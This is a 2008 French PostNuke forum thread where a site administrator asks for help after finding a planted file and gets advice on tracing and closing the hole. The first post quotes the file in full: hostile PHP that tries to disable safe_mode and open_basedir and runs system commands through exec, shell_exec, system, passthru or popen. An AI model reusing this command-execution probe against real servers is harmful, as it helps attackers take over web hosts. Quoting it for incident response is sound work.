Attaque zombie sur PN .764 :: PostNuke-France.org

Samedi 05 Juillet 2008 - 04:31

Sujet Précédent Sujet Suivant Derniers messages

Auteur	Sujet
Attaque zombie sur PN .764
zmimi83 Bisu enregistré depuis : sep. 2005 Messages : 60 dernière visite: 03.03.08	Bojour à tous, J'ai un gros soucis de sécurité. Un fichier nommé ftp.txt, contenant le code malvaillant suivant à été positionné dans le répertoire /modules/Downloads/screenshots : Code: [Télécharger] [Cacher] Code: [Télécharger] [Afficher] <?php if((@eregi("uid",ex("id"))) \|\| (@eregi("Windows",ex("net start")))){ $contrs=0; } else{ ini_restore("safe_mode"); ini_restore("open_basedir"); if((@eregi("uid",ex("id"))) \|\| (@eregi("Windows",ex("net start")))){ $contrs=0;} else{ $contrs=1; }} if($contrs == 0){ echo("FUCKSAFEMODEOFFBYMIC22"); }else{ echo("FUCKSAFEMODEONBYMIC22"); } function ex($cfe){ $res = ''; if (!empty($cfe)){ if(function_exists('exec')){ @exec($cfe,$res); $res = join("\n",$res); } elseif(function_exists('shell_exec')){ $res = ;@shell_exec($cfe); } elseif(function_exists('system')){ @ob_start(); @system($cfe); $res = ;@ob_get_contents(); @ob_end_clean(); } elseif(function_exists('passthru')){ @ob_start(); @passthru($cfe); $res = ;@ob_get_contents(); @ob_end_clean(); } elseif(@is_resource($f = ;@popen($cfe,"r"))){ $res = ""; while(!@feof($f)) { $res .= ;@fread($f,1024); } @pclose($f); }} return $res; } exit; Quel traîtement dois-je appliquer à ce problème, et comment m'en protéger dans le futur ? Merci d'avance pour l'aide !!! modifié par : zmimi83, 25 Jan 2008 - 11:45
25.01.2008, 11:45

Gilles Grand Maître enregistré depuis : jui. 2005 Messages : 2191 dernière visite: 04.07.08	Sais-tu de quelle manière il a été positionné ? Que contient d'autes le dossier /modules/Downloads/screenshots ? Normalement avec une extention .txt, tu ne peux pas faire grand chose. Si tu as des uploads possible sur le site, peut-être faut-il les renforcer (membres seulement etc...) Gilles ><>°
25.01.2008, 11:59

zmimi83 Bisu enregistré depuis : sep. 2005 Messages : 60 dernière visite: 03.03.08	Bonjour Gilles, J'ai vérifié les logs ftp, il ne semble pas que cela soit par là que cela soit passé ! Le répertoire incriminé ne contient rien d'autre que ce fichier. J'ai carrément viré le module Download dont je ne me sert pas ! Est-ce que cela va suffire ? Merci d'avance ! modifié par : zmimi83, 25 Jan 2008 - 14:29
25.01.2008, 14:29

zmimi83 Bisu enregistré depuis : sep. 2005 Messages : 60 dernière visite: 03.03.08	Bonjour Gilles, J'ai vérifié les logs ftp, il ne semble pas que cela soit par là que cela soit passé ! Le répertoire incriminé ne contient rien d'autre que ce fichier. J'ai carrément viré le module Download dont je ne me sers pas ! Est-ce que cela va suffire ? Merci d'avance ! modifié par : zmimi83, 25 Jan 2008 - 14:31
25.01.2008, 14:30

Gilles Grand Maître enregistré depuis : jui. 2005 Messages : 2191 dernière visite: 04.07.08	Citation : J'ai carrément viré le module Download dont je ne me sers pas ! Est-ce que cela va suffire ? Si la faille vient du module download oui... Par contre si tu as les access.log et / ou error.log ca pourra donner des pistes ! ++ Gilles ><>°
25.01.2008, 17:17

zmimi83 Bisu enregistré depuis : sep. 2005 Messages : 60 dernière visite: 03.03.08	Bon ! Je crois que j'ai trouvé ! Il semblerait que tout vienne du fait que j'utilisais PNphpBB2 ! Du coup, j'ai migré vers pnForum ! Mais en mettant à jour ce module vers sa version 2.7.1, et que le thème de mon PN 7.64 est un Autotheme, il m'a fallu installer un theme pour pnForum. Le problème est que celui-ci semble ne pas être complet ! Quand je vais sur "Derniers posts", ou bien dans "Profil", je n'ai plus de mise en page, la présentation est brute ! Voir un exemple ici : http://www.modem56.fr/index.php?module=pnForum&func=viewlatest Si quelqu'un connait une solution, je suis preneur !!! Merci d'avance
01.02.2008, 12:34

Samedi 05 Juillet 2008

Sujet Précédent | Sujet Suivant

Généré par pnForum Version 2.6
CA_Aphrodite design by Vjacheslav Trushkin - phpBBStyles.com
Ported to PostNuke pnForum by Chestnut - http://dev.pnconcept.com

Tous les logos et marques de commerce sur ce site sont la propriété de leur auteur respectif.
Les commentaires sont la propriété des intervenants, tout le reste (c) 2004 par PostNuke-France.
Ce site Internet a été créé avec PostNuke, un système de portail Web écrit en PHP. PostNuke est distribué sous la licence GNU/GPL.
Vous avez accès au Fil de syndication de ce site en utilisant le fichier backend.php.
Ce site a fait l'objet d'une déclaration au CNIL sous le No 820332,
conformément à l'article 27 de la loi n°78-17 du 6 janvier 1978 relative à l'informatique, aux fichiers et aux libertés.
Thème général adapté en partie d'un thème phpbbstyles.com

Page générée en 0,675580978394 seconde(s).